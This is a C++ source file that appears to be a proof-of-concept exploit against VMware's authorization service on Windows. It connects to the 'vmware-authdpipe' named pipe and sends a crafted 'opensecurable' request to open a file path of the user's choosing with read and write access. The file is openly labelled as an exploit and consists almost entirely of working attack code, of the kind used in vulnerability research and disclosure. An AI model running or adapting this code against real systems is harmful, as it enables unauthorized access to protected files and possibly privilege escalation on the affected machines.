// vmware-vmx.cpp : This file contains the 'main' function. Program execution begins and ends there.
//

#include "pch.h"
#include <string>
#include <strsafe.h>
#include "ScopedHandle.h"

std::string ReadFromPipe(HANDLE pipe)
{
    char buffer[4096] = {};
    DWORD bytes_read = 0;
    if (!ReadFile(pipe, buffer, sizeof(buffer) - 1, &bytes_read, nullptr))
    {
        return "";
    }

    return std::string(buffer, bytes_read);
}

BOOL WriteToPipe(HANDLE pipe, const std::string& str)
{
    DWORD bytes_written = 0;
    return WriteFile(pipe, str.data(), str.size(), &bytes_written, nullptr) && bytes_written == str.size();
}

std::string BuildFileRequest(const std::string& path, DWORD desired_access, DWORD flags)
{
    char buffer[4096] = {};
    if (FAILED(StringCchPrintfA(buffer, sizeof(buffer), "opensecurable%s|1 %d 7 3 %d %d", path.c_str(), desired_access, flags, GetCurrentProcessId())))
    {
        return "";
    }

    return buffer;
}

void RunExploit(LPSTR path)
{
    if (strlen(path) == 0)
    {
        printf("No path specified\n");
        return;
    }
    LPCWSTR pipe_name = L"\\\\.\\pipe\\vmware-authdpipe";
    bool done = false;
    while (!done)
    {
        if (!WaitNamedPipe(pipe_name, NMPWAIT_WAIT_FOREVER))
        {
            printf("Error waiting on named pipe: %d\n", GetLastError());
            break;
        }

        ScopedHandle pipe = CreateFile(L"\\\\.\\pipe\\vmware-authdpipe", FILE_READ_DATA | FILE_WRITE_DATA, 0, nullptr, OPEN_EXISTING, 0, nullptr);
        if (!pipe.IsValid())
        {
            printf("Error opening pipe %d\n", GetLastError());
            continue;
        }

        std::string file_request = BuildFileRequest(path, GENERIC_READ | GENERIC_WRITE, 0);
        printf("Request: %s\n", file_request.c_str());
        if (WriteToPipe(pipe, file_request))
        {
            printf("Return: %s\n", ReadFromPipe(pipe).c_str());
            done = true;
        }
    }
}

int main(int argc, char** argv)
{
    bool done = false;
    for (int i = 1; i < argc; ++i)
    {
        if (strncmp(argv[i], "-f:", 3) == 0)
        {
            RunExploit(&argv[i][3]);
            done = true;
            break;
        }
    }

    if (!done)
    {
        printf("Couldn't find file path\n");
    }

    (void)getchar();
}
